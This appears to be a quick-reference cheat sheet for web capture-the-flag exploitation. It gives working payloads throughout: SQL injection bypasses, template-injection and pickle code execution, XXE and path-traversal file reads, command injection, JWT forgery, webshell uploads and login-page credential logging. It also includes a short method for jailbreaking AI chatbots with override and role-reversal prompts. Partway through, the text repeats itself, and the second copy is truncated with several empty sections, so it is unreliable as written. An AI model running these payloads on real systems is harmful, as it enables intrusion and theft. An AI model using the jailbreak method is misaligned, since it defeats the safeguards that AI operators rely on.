CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

server-side.md - Core server-side injection attacks: SQLi (EXIF metadata injection, MySQL column truncation, backslash/hex bypass, second-order, LIKE brute-force, processList trick, XML entity WAF bypass), SSTI (Jinja2, Go, EJS, ERB Sequel bypass, Mako, Twig, __dict__.update() quote bypass), SSRF (Host header, DNS rebinding, curl redirect), XXE, command injection (newline, blocklist bypass, sendmail, multi-barcode), PHP type juggling, PHP file inclusion / php://filter
server-side-exec.md - Code execution and server-side access attacks: Ruby/Perl/JS code injection, LaTeX injection RCE, PHP preg_replace /e RCE, Prolog injection, ReDoS timing oracle, file upload→RCE (.htaccess, log poisoning, Python .so hijack, Gogs symlink, ZipSlip), PHP deserialization from cookies, PHP extract() variable overwrite, XPath blind injection, Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF bypass, SQLi keyword fragmentation bypass, SQL WHERE ORDER BY bypass, SQL injection via DNS records, API filter injection, WebSocket mass assignment
server-side-deser.md - Deserialization and execution attacks: Java deserialization (ysoserial gadget chains, JNDI injection, blind detection), Python pickle RCE (__reduce__, restricted unpickler bypass, STOP opcode chaining), race conditions (TOCTOU async exploits, double-spend, coupon reuse)
server-side-advanced.md - Advanced server-side techniques: ExifTool CVE-2021-22204, Go rune/byte mismatch, zip symlink traversal, path traversal bypasses (brace stripping, double URL encoding, os.path.join, %2f), Flask/Werkzeug debug mode, XXE external DTD filter bypass, WeasyPrint SSRF, MongoDB regex injection, Pongo2 Go template injection, ZIP PHP webshell, basename() bypass, React Server Components Flight RCE (CVE-2025-55182), SSRF→Docker API RCE chain, Castor XML xsi:type deserialization (Atlas HTB), Apache ErrorDocument expression file read (Zero HTB), SQLite file path traversal to bypass string equality
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements, XS-Leak timing oracle, GraphQL CSRF, Unicode case folding XSS bypass (long-s U+017F), CSS font glyph container query exfiltration, Hyperscript CDN CSP bypass, PBKDF2 prefix timing oracle, client-side HMAC bypass via leaked JS secret
auth-and-access.md - Auth/authz attacks: password inference, weak validation, client-side gates, NoSQL auth bypass, HAProxy/Express.js bypass, IDOR on WIP endpoints, HTTP TRACE method bypass, LLM/AI chatbot jailbreak, open redirect chains (OAuth token theft), subdomain takeover, Apache mod_status info disclosure + session forging
auth-jwt.md - JWT/JWE token attacks: algorithm none, RS256→HS256 confusion, weak secret, unverified signature, JWK/JKU header injection, KID path traversal, balance replay, JWE forgery with exposed public key
auth-infra.md - Infrastructure auth: OAuth/OIDC exploitation (redirect_uri bypass, token manipulation, state CSRF), CORS misconfiguration, git history credential leakage, CI/CD variable theft, identity provider API takeover (authentik/Keycloak), SAML SSO flow automation, Guacamole parameter extraction, login page poisoning, TeamCity REST API RCE
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE, Lodash+Pug AST injection
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, transient storage clearing collision (0.8.28-0.8.33), Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass, ExifTool DjVu, broken auth, AAEncode/JJEncode, protocol multiplexing, React Server Components Flight RCE (CVE-2025-55182), Ruby-SAML XPath digest smuggling (CVE-2024-45409, Barrier HTB), PaperCut NG auth bypass + RCE (CVE-2023-27350, Bamboo HTB), Zabbix blind SQLi (CVE-2024-22120, Watcher HTB)

Reconnaissance

View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /debug, /.git/, /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed
Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)
Check assets returning 404 status — favicon.ico, robots.txt may contain data despite error codes: strings favicon.ico | grep -i flag
Tor hidden services: feroxbuster -u 'http://target.onion/' -w wordlist.txt --proxy socks5h://127.0.0.1:9050 -t 10 -x .txt,.html,.bak

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

' OR '1'='1                    # Classic auth bypass
' OR 1=1--                     # Comment termination
username=\&password= OR 1=1--  # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite schema
0x6d656f77                     # Hex encoding for 'meow' (bypass quotes)

XML entity encoding: UNION → UNION after XML parser decodes, bypasses WAF keyword filters.

EXIF metadata injection: embed SQL in image EXIF fields (exiftool -Comment="' UNION SELECT flag FROM flags--" image.jpg) to bypass WAFs that only inspect HTTP parameters.

See server-side.md for second-order SQLi, LIKE brute-force, MySQL column truncation, SQLi→SSTI chains, XML entity WAF bypass, EXIF metadata injection. See server-side-exec.md for SQLi via DNS records, SQLi keyword fragmentation, PHP preg_replace /e RCE, Prolog injection.

XSS Quick Reference

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass: hex \x3cscript\x3e, entities <script>, case mixing <ScRiPt>, event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

Path Traversal / LFI Quick Reference

../../../etc/passwd
....//....//....//etc/passwd     # Filter bypass
..%2f..%2f..%2fetc/passwd        # URL encoding
%252e%252e%252f                  # Double URL encoding
{.}{.}/flag.txt                  # Brace stripping bypass

Python footgun: os.path.join('/app/public', '/etc/passwd') returns /etc/passwd

JWT Quick Reference

alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey, .env, /debug/config
Balance replay — save JWT, spend, replay old JWT, return items for profit
Unverified signature — modify payload, keep original signature
JWK header injection — embed attacker public key in token header
JKU header injection — point to attacker-controlled JWKS URL
KID path traversal — ../../../dev/null for empty key, or SQL injection in KID

See auth-jwt.md for full JWT/JWE attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns 49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go template
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
# Jinja2 quote bypass (keyword args):
{{obj.__dict__.update(attr=value) or obj.name}}

Mako SSTI (Python): ${__import__('os').popen('id').read()} — no sandbox, plain Python inside ${} or <% %>. Twig SSTI (PHP): {{['id']|map('system')|join}} — distinguish from Jinja2 via {{7*'7'}} (Twig repeats string, Jinja2 returns 49). See server-side.md and server-side.md.

Quote filter bypass: Use __dict__.update(key=value) — keyword arguments need no quotes. See server-side.md.

ERB SSTI (Ruby/Sinatra): <%= Sequel::DATABASES.first[:table].all %> bypasses ERBSandbox variable-name restrictions via the global Sequel::DATABASES array. See server-side.md.

Thymeleaf SpEL SSTI (Java/Spring): ${T(org.springframework.util.FileCopyUtils).copyToByteArray(new java.io.File("/flag.txt"))} reads files via Spring utility classes when standard I/O is WAF-blocked. Works in distroless containers (no shell). See server-side-exec.md.

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Host header SSRF: Server builds internal request URL from Host header (e.g., http.Get("http://" + request.Host + "/validate")). Set Host to attacker domain → validation request goes to attacker server. See server-side.md.

Command Injection Quick Reference

; id          | id          `id`          $(id)
%0aid         # Newline     127.0.0.1%0acat /flag

When cat/head blocked: sed -n p flag.txt, awk '{print}', tac flag.txt

XXE Quick Reference

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP filter: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

PHP Type Juggling Quick Reference

Loose == performs type coercion: 0 == "string" is true, "0e123" == "0e456" is true (magic hashes). Send JSON integer 0 to bypass string password checks. strcmp([], "str") returns NULL which passes !strcmp(). Use === for defense.

See server-side.md for comparison table and exploit payloads.

PHP File Inclusion / LFI Quick Reference

php://filter/convert.base64-encode/resource=config leaks PHP source code without execution. Common LFI targets: /etc/passwd, /proc/self/environ, app config files. Null byte (%00) truncates .php suffix on PHP < 5.3.4.

See server-side.md for filter chains and RCE techniques.

Code Injection Quick Reference

Ruby instance_eval: Break string + comment: VALID');INJECTED_CODE# Perl open(): 2-arg open allows pipe: |command| JS eval blocklist bypass: row['con'+'structor']['con'+'structor']('return this')() PHP deserialization: Craft serialized object in cookie → LFI/RCE LaTeX injection: \input{|"cat /flag.txt"} — shell command via pipe syntax in PDF generation services. \@@input"/etc/passwd" for file reads without shell.

See server-side-exec.md for full payloads and bypass techniques.

Java Deserialization

Serialized Java objects (rO0AB / aced0005) + ysoserial gadget chains → RCE via ObjectInputStream.readObject(). Try CommonsCollections1-7, URLDNS for blind detection. See server-side-deser.md.

Python Pickle Deserialization

pickle.loads() calls __reduce__() → (os.system, ('cmd',)) instant RCE. Also via yaml.load(), torch.load(), joblib.load(). See server-side-deser.md.

Race Conditions (TOCTOU)

Concurrent requests bypass check-then-act patterns (balance, coupons, registration). Send 50 simultaneous requests — all see pre-modification state. See server-side-deser.md.

Node.js Quick Reference

Prototype pollution: {"__proto__": {"isAdmin": true}} or flatnest circular ref bypass VM escape: this.constructor.constructor("return process")() → RCE Full chain: pollution → enable JS eval in Happy-DOM → VM escape → RCE

Prototype pollution permission bypass (Server OC, Pragyan 2026):

# When Express.js endpoint checks req.body.isAdmin or similar:
curl -X POST -H 'Content-Type: application/json' \
  -d '{"Path":"value","__proto__":{"isAdmin":true}}' \
  'https://target/endpoint'
# __proto__ pollutes Object.prototype, making isAdmin truthy on all objects

Key insight: Always try __proto__ injection on JSON endpoints, even when the vulnerability seems like something else (race condition, SSRF, etc.).

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

Cookie manipulation: role=admin, isAdmin=true
Public admin-login cookie seeding: check if /admin/login sets reusable admin session cookie
Host header bypass: Host: 127.0.0.1
Hidden endpoints: search JS bundles for /api/internal/, /api/admin/; fuzz with auth cookie for non-/api routes like /internal/*
Client-side gates: window.overrideAccess = true or call API directly
Password inference: profile data + structured ID format → brute-force
Weak signature: check if only first N chars of hash are validated
Affine cipher OTP: only 312 possible values (12 mults × 26 adds), brute-force all in seconds
Express.js %2F middleware bypass: /api/export%2Fchat skips app.all("/api/export/chat") middleware; nginx decodes %2F before proxying
IDOR (Insecure Direct Object Reference) on WIP endpoints: grep for WIP/TODO/debug comments, compare auth decorators against production endpoints
Git history credential leakage: git log -p --all -S "password" finds deleted secrets
CI/CD variable theft: GitLab/Jenkins/GitHub CI/CD variables store service account tokens
Identity provider API takeover: admin token → set any user's password, bypass MFA with not_configured_action: skip
SAML SSO automation: preserve RelayState through entire flow, submit signed SAMLResponse to callback
Guacamole parameter extraction: API token or MySQL access exposes SSH keys and passphrases
Login page poisoning: inject credential logger into login page, harvest automated logins from /dev/shm/creds.txt
TeamCity REST API RCE: admin creds → create project → add build step → trigger build (runs as build agent user, often root)

Apache mod_status Information Disclosure

/server-status endpoint reveals active URLs, client IPs, and session data. Use for admin endpoint discovery and session forging. See auth-and-access.md.

Open Redirect Chains

Chain open redirects (?redirect=, ?next=, ?url=) with OAuth flows for token theft. Bypass validation with @, %00, //, \, CRLF. See auth-and-access.md.

Subdomain Takeover

Dangling CNAME → claim resource on external service (GitHub Pages, S3, Heroku). Use subfinder + httpx to enumerate, check fingerprints. See auth-and-access.md.

See auth-and-access.md for access control bypasses, auth-jwt.md for JWT/JWE attacks, and auth-infra.md for OAuth/SAML/CI-CD/infrastructure auth.

File Upload → RCE

.htaccess upload: AddType application/x-httpd-php .lol + webshell
Gogs symlink: overwrite .git/config with core.sshCommand RCE
Python .so hijack: write malicious shared object + delete .pyc to force reimport
ZipSlip: symlink in zip for file read, path traversal for file write
Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side-exec.md for detailed steps.

Multi-Stage Chain Patterns

0xClinic chain: Password inference → path traversal + ReDoS oracle (leak secrets from /proc/1/environ) → CRLF injection (CSP bypass + cache poisoning + XSS) → urllib scheme bypass (SSRF) → .so write via path traversal → RCE

Key chaining insights:

Path traversal + any file-reading primitive → leak /proc/*/environ, /proc/*/cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
Arbitrary file write in Python → .so hijacking or .pyc overwrite for RCE
Lowercased response body → use hex escapes (\x3c for <)

Useful Tools

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # Directory fuzzing
flask-unsign --decode --cookie "eyJ..."      # JWT decode
hashcat -m 16500 jwt.txt wordlist.txt        # JWT crack
dalfox url http://target/?q=test             # XSS

Flask/Werkzeug Debug Mode

Weak session secret brute-force + forge admin session + Werkzeug debugger PIN RCE. See server-side-advanced.md for full attack chain.

XXE with External DTD Filter Bypass

Host malicious DTD externally to bypass upload keyword filters. See server-side-advanced.md for payload and webhook.site setup.

JSFuck Decoding

Remove trailing ()(), eval in Node.js, .toString() reveals original code. See client-side.md.

DOM XSS via jQuery Hashchange (Crypto-Cat)

$(location.hash) + hashchange event → XSS via iframe: <iframe src="https://target/#" onload="this.src+='<img src=x onerror=print()>'">. See client-side.md.

Shadow DOM XSS

Proxy attachShadow to capture closed roots; (0,eval) for scope escape; </script> injection. See client-side.md.

DOM Clobbering + MIME Mismatch

.jpg served as text/html; <form id="config"> clobbers JS globals. See client-side.md.

HTTP Request Smuggling via Cache Proxy

Cache proxy desync for cookie theft via incomplete POST body. See client-side.md.

Path Traversal: URL-Encoded Slash Bypass

%2f bypasses nginx route matching but filesystem resolves it. See server-side-advanced.md.

WeasyPrint SSRF & File Read (CVE-2024-28184)

<a rel="attachment" href="file:///flag.txt"> or <link rel="attachment" href="http://127.0.0.1/admin"> -- WeasyPrint embeds fetched content as PDF attachments, bypassing header checks. Boolean oracle via /Type /EmbeddedFile presence. See server-side-advanced.md and cves.md.

MongoDB Regex / $where Blind Injection

Break out of /.../i with a^/)||(<condition>)&&(/a^. Binary search charCodeAt() for extraction. See server-side-advanced.md.

Pongo2 / Go Template Injection

{% include "/flag.txt" %} in uploaded file + path traversal in template parameter. See server-side-advanced.md.

ZIP Upload with PHP Webshell

Upload ZIP containing .php file → extract to web-accessible dir → file_get_contents('/flag.txt'). See server-side-advanced.md.

basename() Bypass for Hidden Files

basename() only strips dirs, doesn't filter .lock or hidden files in same directory. See server-side-advanced.md.

Custom Linear MAC Forgery

Linear XOR-based signing with secret blocks → recover from known pairs → forge for target. See auth-and-access.md.

CSS/JS Paywall Bypass

Content behind CSS overlay (position: fixed; z-index: 99999) is still in the raw HTML. curl or view-source bypasses it instantly. See client-side.md.

SSRF → Docker API RCE Chain

SSRF to unauthenticated Docker daemon on port 2375. Use /archive for file extraction, /exec + /exec/{id}/start for command execution. Chain through internal POST relay when SSRF is GET-only. See server-side-advanced.md.

Castor XML Deserialization via xsi:type (Atlas HTB)

Castor XML Unmarshaller without mapping file trusts xsi:type attributes for arbitrary Java class instantiation. Chain through JNDI (Java Naming and Directory Interface) / RMI (Remote Method Invocation) via ysoserial CommonsBeanutils1 for RCE. Requires Java 11 (not 17+). Check pom.xml for castor-xml. See server-side-advanced.md.

Apache ErrorDocument Expression File Read (Zero HTB)

.htaccess with ErrorDocument 404 "%{file:/etc/passwd}" reads files at Apache level, bypassing php_admin_flag engine off. Requires AllowOverride FileInfo. Upload via SFTP, trigger with 404 request. See server-side-advanced.md.

HTTP TRACE Method Bypass

Endpoints returning 403 on GET/POST may respond to TRACE, PUT, PATCH, or DELETE. Test with curl -X TRACE. See auth-and-access.md.

LLM/AI Chatbot Jailbreak

AI chatbots guarding flags can be bypassed with system override prompts, role-reversal, or instruction leak requests. Rotate session IDs and escalate prompt severity. See auth-and-access.md.

Admin Bot javascript: URL Scheme Bypass

new URL() validates syntax only, not protocol — javascript: URLs pass and execute in Puppeteer's authenticated context. CSP/SRI on the target page are irrelevant since JS runs in navigation context. See client-side.md.

XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty)

HTML injection → meta refresh redirect (CSP bypass) → admin bot loads attacker page → JavaScript makes cross-origin GET requests to localhost GraphQL endpoint via new Image().src → measures time-based SQLi (SLEEP(1)) through image error timing → character-by-character flag exfiltration. GraphQL GET requests bypass CORS preflight. See client-side.md.

React Server Components Flight Protocol RCE (Ehax 2026)

Identify via Next-Action + Accept: text/x-component headers. CVE-2025-55182: fake Flight chunk exploits constructor chain for server-side JS execution. Exfiltrate via NEXT_REDIRECT error → x-action-redirect header. WAF bypass: 'chi'+'ld_pro'+'cess' or hex '\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73'. See server-side-advanced.md and cves.md.

Unicode Case Folding XSS Bypass (UNbreakable 2026)

Pattern: Sanitizer regex uses ASCII-only matching (<\s*script), but downstream processing applies Unicode case folding (strings.EqualFold). <ſcript> (U+017F Latin Long S) bypasses regex but folds to <script>. Other pairs: ı→i, K (U+212A)→k. See client-side.md.

CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026)

Pattern: Exfiltrate inline text via CSS injection (no JS). Custom font assigns unique glyph widths per character. Container queries match width ranges to fire background-image requests — one request per character. Works under strict CSP. See client-side.md.

Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026)

Pattern: CSP allows cdnjs.cloudflare.com. Load Hyperscript (_= attributes) or Alpine.js (x-data, x-init) from CDN — they execute code from HTML attributes that sanitizers don't strip. See client-side.md.

Solidity Transient Storage Clearing Collision (0.8.28-0.8.33)

Pattern: Solidity IR pipeline (--via-ir) generates identically-named Yul helpers for delete on persistent and transient variables of the same type. One uses sstore, the other should use tstore, but deduplication picks only one. Exploits: overwrite owner (slot 0) via transient delete, or make persistent delete (revoke approvals) ineffective. Workaround: use _lock = address(0) instead of delete _lock. See web3.md.

Client-Side HMAC Bypass via Leaked JS Secret (Codegate 2013)

Deobfuscate client-side JS to extract hardcoded HMAC secret, then forge signatures for arbitrary requests via browser console. See client-side.md.

SQLi Keyword Fragmentation Bypass (SecuInside 2013)

Single-pass preg_replace() keyword filters bypassed by nesting the stripped keyword inside the payload: unload_fileon → union after load_file removal. See server-side-exec.md.

Pickle Chaining via STOP Opcode Stripping (VolgaCTF 2013)

Strip pickle STOP opcode (\x2e) from first payload, concatenate second — both __reduce__ calls execute in single pickle.loads(). Chain os.dup2() for socket output. See server-side-deser.md.

XPath Blind Injection (BaltCTF 2013)

substring(normalize-space(../../../node()),1,1)='a' — boolean-based blind extraction from XML data stores via response length oracle. See server-side-exec.md.

SQLite File Path Traversal to Bypass String Equality (Codegate 2013)

Input /../gamesim_GM fails == "GM" string check but filesystem normalizes /var/game_db/gamesim_/../gamesim_GM.db to the blocked path. See server-side-advanced.md.

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes

CTF Web Exploitation

Quick reference for web CTF challenges. Each technique has a one-liner here; see supporting files for full details with payloads and code.

Additional Resources

server-side.md - Core server-side injection attacks: SQLi (EXIF metadata injection, MySQL column truncation, backslash/hex bypass, second-order, LIKE brute-force, processList trick, XML entity WAF bypass), SSTI (Jinja2, Go, EJS, ERB Sequel bypass, Mako, Twig, __dict__.update() quote bypass), SSRF (Host header, DNS rebinding, curl redirect), XXE, command injection (newline, blocklist bypass, sendmail, multi-barcode), PHP type juggling, PHP file inclusion / php://filter
server-side-exec.md - Code execution and server-side access attacks: Ruby/Perl/JS code injection, LaTeX injection RCE, PHP preg_replace /e RCE, Prolog injection, ReDoS timing oracle, file upload→RCE (.htaccess, log poisoning, Python .so hijack, Gogs symlink, ZipSlip), PHP deserialization from cookies, PHP extract() variable overwrite, XPath blind injection, Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF bypass, SQLi keyword fragmentation bypass, SQL WHERE ORDER BY bypass, SQL injection via DNS records, API filter injection, WebSocket mass assignment
server-side-deser.md - Deserialization and execution attacks: Java deserialization (ysoserial gadget chains, JNDI injection, blind detection), Python pickle RCE (__reduce__, restricted unpickler bypass, STOP opcode chaining), race conditions (TOCTOU async exploits, double-spend, coupon reuse)
server-side-advanced.md - Advanced server-side techniques: ExifTool CVE-2021-22204, Go rune/byte mismatch, zip symlink traversal, path traversal bypasses (brace stripping, double URL encoding, os.path.join, %2f), Flask/Werkzeug debug mode, XXE external DTD filter bypass, WeasyPrint SSRF, MongoDB regex injection, Pongo2 Go template injection, ZIP PHP webshell, basename() bypass, React Server Components Flight RCE (CVE-2025-55182), SSRF→Docker API RCE chain, Castor XML xsi:type deserialization (Atlas HTB), Apache ErrorDocument expression file read (Zero HTB), SQLite file path traversal to bypass string equality
client-side.md - Client-side attacks: XSS, CSRF, CSPT, cache poisoning, DOM tricks, React input filling, hidden elements, XS-Leak timing oracle, GraphQL CSRF, Unicode case folding XSS bypass (long-s U+017F), CSS font glyph container query exfiltration, Hyperscript CDN CSP bypass, PBKDF2 prefix timing oracle, client-side HMAC bypass via leaked JS secret
auth-and-access.md - Auth/authz attacks: password inference, weak validation, client-side gates, NoSQL auth bypass, HAProxy/Express.js bypass, IDOR on WIP endpoints, HTTP TRACE method bypass, LLM/AI chatbot jailbreak, open redirect chains (OAuth token theft), subdomain takeover, Apache mod_status info disclosure + session forging
auth-jwt.md - JWT/JWE token attacks: algorithm none, RS256→HS256 confusion, weak secret, unverified signature, JWK/JKU header injection, KID path traversal, balance replay, JWE forgery with exposed public key
auth-infra.md - Infrastructure auth: OAuth/OIDC exploitation (redirect_uri bypass, token manipulation, state CSRF), CORS misconfiguration, git history credential leakage, CI/CD variable theft, identity provider API takeover (authentik/Keycloak), SAML SSO flow automation, Guacamole parameter extraction, login page poisoning, TeamCity REST API RCE
node-and-prototype.md - Node.js: prototype pollution, VM sandbox escape, Happy-DOM chain, flatnest CVE, Lodash+Pug AST injection
web3.md - Blockchain/Web3: Solidity exploits, proxy patterns, ABI encoding tricks, transient storage clearing collision (0.8.28-0.8.33), Foundry tooling
cves.md - CVE-specific exploits: Next.js middleware bypass, curl credential leak, Uvicorn CRLF, urllib scheme bypass, ExifTool DjVu, broken auth, AAEncode/JJEncode, protocol multiplexing, React Server Components Flight RCE (CVE-2025-55182), Ruby-SAML XPath digest smuggling (CVE-2024-45409, Barrier HTB), PaperCut NG auth bypass + RCE (CVE-2023-27350, Bamboo HTB), Zabbix blind SQLi (CVE-2024-22120, Watcher HTB)

Reconnaissance

View source for HTML comments, check JS/CSS files for internal APIs
Look for .map source map files
Check response headers for custom X- headers and auth hints
Common paths: /robots.txt, /sitemap.xml, /.well-known/, /admin, /api, /debug, /.git/, /.env
Search JS bundles: grep -oE '"/api/[^"]+"' for hidden endpoints
Check for client-side validation that can be bypassed
Compare what the UI sends vs. what the API accepts (read JS bundle for all fields)
Check assets returning 404 status — favicon.ico, robots.txt may contain data despite error codes: strings favicon.ico | grep -i flag
Tor hidden services: feroxbuster -u 'http://target.onion/' -w wordlist.txt --proxy socks5h://127.0.0.1:9050 -t 10 -x .txt,.html,.bak

SQL Injection Quick Reference

Detection: Send ' — syntax error indicates SQLi

' OR '1'='1                    # Classic auth bypass
' OR 1=1--                     # Comment termination
username=\&password= OR 1=1--  # Backslash escape quote bypass
' UNION SELECT sql,2,3 FROM sqlite_master--  # SQLite schema
0x6d656f77                     # Hex encoding for 'meow' (bypass quotes)

XML entity encoding: UNION → UNION after XML parser decodes, bypasses WAF keyword filters.

EXIF metadata injection: embed SQL in image EXIF fields (exiftool -Comment="' UNION SELECT flag FROM flags--" image.jpg) to bypass WAFs that only inspect HTTP parameters.

XSS Quick Reference

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter bypass: hex \x3cscript\x3e, entities <script>, case mixing <ScRiPt>, event handlers.

See client-side.md for DOMPurify bypass, cache poisoning, CSPT, React input tricks.

Path Traversal / LFI Quick Reference

../../../etc/passwd
....//....//....//etc/passwd     # Filter bypass
..%2f..%2f..%2fetc/passwd        # URL encoding
%252e%252e%252f                  # Double URL encoding
{.}{.}/flag.txt                  # Brace stripping bypass

Python footgun: os.path.join('/app/public', '/etc/passwd') returns /etc/passwd

JWT Quick Reference

alg: none — remove signature entirely
Algorithm confusion (RS256→HS256) — sign with public key
Weak secret — brute force with hashcat/flask-unsign
Key exposure — check /api/getPublicKey, .env, /debug/config
Balance replay — save JWT, spend, replay old JWT, return items for profit
Unverified signature — modify payload, keep original signature
JWK header injection — embed attacker public key in token header
JKU header injection — point to attacker-controlled JWKS URL
KID path traversal — ../../../dev/null for empty key, or SQL injection in KID

See auth-jwt.md for full JWT/JWE attacks and session manipulation.

SSTI Quick Reference

Detection: {{7*7}} returns 49

# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Go template
{{.ReadFile "/flag.txt"}}
# EJS
<%- global.process.mainModule.require('child_process').execSync('id') %>
# Jinja2 quote bypass (keyword args):
{{obj.__dict__.update(attr=value) or obj.name}}

Quote filter bypass: Use __dict__.update(key=value) — keyword arguments need no quotes. See server-side.md.

ERB SSTI (Ruby/Sinatra): <%= Sequel::DATABASES.first[:table].all %> bypasses ERBSandbox variable-name restrictions via the global Sequel::DATABASES array. See server-side.md.

SSRF Quick Reference

127.0.0.1, localhost, 127.1, 0.0.0.0, [::1]
127.0.0.1.nip.io, 2130706433, 0x7f000001

DNS rebinding for TOCTOU: https://lock.cmpxchg8b.com/rebinder.html

Command Injection Quick Reference

; id          | id          `id`          $(id)
%0aid         # Newline     127.0.0.1%0acat /flag

When cat/head blocked: sed -n p flag.txt, awk '{print}', tac flag.txt

XXE Quick Reference

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

PHP filter: <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">

PHP Type Juggling Quick Reference

See server-side.md for comparison table and exploit payloads.

PHP File Inclusion / LFI Quick Reference

See server-side.md for filter chains and RCE techniques.

Code Injection Quick Reference

See server-side-exec.md for full payloads and bypass techniques.

Java Deserialization

Python Pickle Deserialization

pickle.loads() calls __reduce__() → (os.system, ('cmd',)) instant RCE. Also via yaml.load(), torch.load(), joblib.load(). See server-side-deser.md.

Race Conditions (TOCTOU)

Concurrent requests bypass check-then-act patterns (balance, coupons, registration). Send 50 simultaneous requests — all see pre-modification state. See server-side-deser.md.

Node.js Quick Reference

Prototype pollution permission bypass (Server OC, Pragyan 2026):

# When Express.js endpoint checks req.body.isAdmin or similar:
curl -X POST -H 'Content-Type: application/json' \
  -d '{"Path":"value","__proto__":{"isAdmin":true}}' \
  'https://target/endpoint'
# __proto__ pollutes Object.prototype, making isAdmin truthy on all objects

Key insight: Always try __proto__ injection on JSON endpoints, even when the vulnerability seems like something else (race condition, SSRF, etc.).

See node-and-prototype.md for detailed exploitation.

Auth & Access Control Quick Reference

Cookie manipulation: role=admin, isAdmin=true
Public admin-login cookie seeding: check if /admin/login sets reusable admin session cookie
Host header bypass: Host: 127.0.0.1
Hidden endpoints: search JS bundles for /api/internal/, /api/admin/; fuzz with auth cookie for non-/api routes like /internal/*
Client-side gates: window.overrideAccess = true or call API directly
Password inference: profile data + structured ID format → brute-force
Weak signature: check if only first N chars of hash are validated
Affine cipher OTP: only 312 possible values (12 mults × 26 adds), brute-force all in seconds
Express.js %2F middleware bypass: /api/export%2Fchat skips app.all("/api/export/chat") middleware; nginx decodes %2F before proxying
IDOR (Insecure Direct Object Reference) on WIP endpoints: grep for WIP/TODO/debug comments, compare auth decorators against production endpoints
Git history credential leakage: git log -p --all -S "password" finds deleted secrets
CI/CD variable theft: GitLab/Jenkins/GitHub CI/CD variables store service account tokens
Identity provider API takeover: admin token → set any user's password, bypass MFA with not_configured_action: skip
SAML SSO automation: preserve RelayState through entire flow, submit signed SAMLResponse to callback
Guacamole parameter extraction: API token or MySQL access exposes SSH keys and passphrases
Login page poisoning: inject credential logger into login page, harvest automated logins from /dev/shm/creds.txt
TeamCity REST API RCE: admin creds → create project → add build step → trigger build (runs as build agent user, often root)

Apache mod_status Information Disclosure

/server-status endpoint reveals active URLs, client IPs, and session data. Use for admin endpoint discovery and session forging. See auth-and-access.md.

Open Redirect Chains

Chain open redirects (?redirect=, ?next=, ?url=) with OAuth flows for token theft. Bypass validation with @, %00, //, \, CRLF. See auth-and-access.md.

Subdomain Takeover

Dangling CNAME → claim resource on external service (GitHub Pages, S3, Heroku). Use subfinder + httpx to enumerate, check fingerprints. See auth-and-access.md.

See auth-and-access.md for access control bypasses, auth-jwt.md for JWT/JWE attacks, and auth-infra.md for OAuth/SAML/CI-CD/infrastructure auth.

File Upload → RCE

.htaccess upload: AddType application/x-httpd-php .lol + webshell
Gogs symlink: overwrite .git/config with core.sshCommand RCE
Python .so hijack: write malicious shared object + delete .pyc to force reimport
ZipSlip: symlink in zip for file read, path traversal for file write
Log poisoning: PHP payload in User-Agent + path traversal to include log

See server-side-exec.md for detailed steps.

Multi-Stage Chain Patterns

Key chaining insights:

Path traversal + any file-reading primitive → leak /proc/*/environ, /proc/*/cmdline
CRLF in headers → CSP bypass + cache poisoning + XSS in one shot
Arbitrary file write in Python → .so hijacking or .pyc overwrite for RCE
Lowercased response body → use hex escapes (\x3c for <)

Useful Tools

sqlmap -u "http://target/?id=1" --dbs       # SQLi
ffuf -u http://target/FUZZ -w wordlist.txt   # Directory fuzzing
flask-unsign --decode --cookie "eyJ..."      # JWT decode
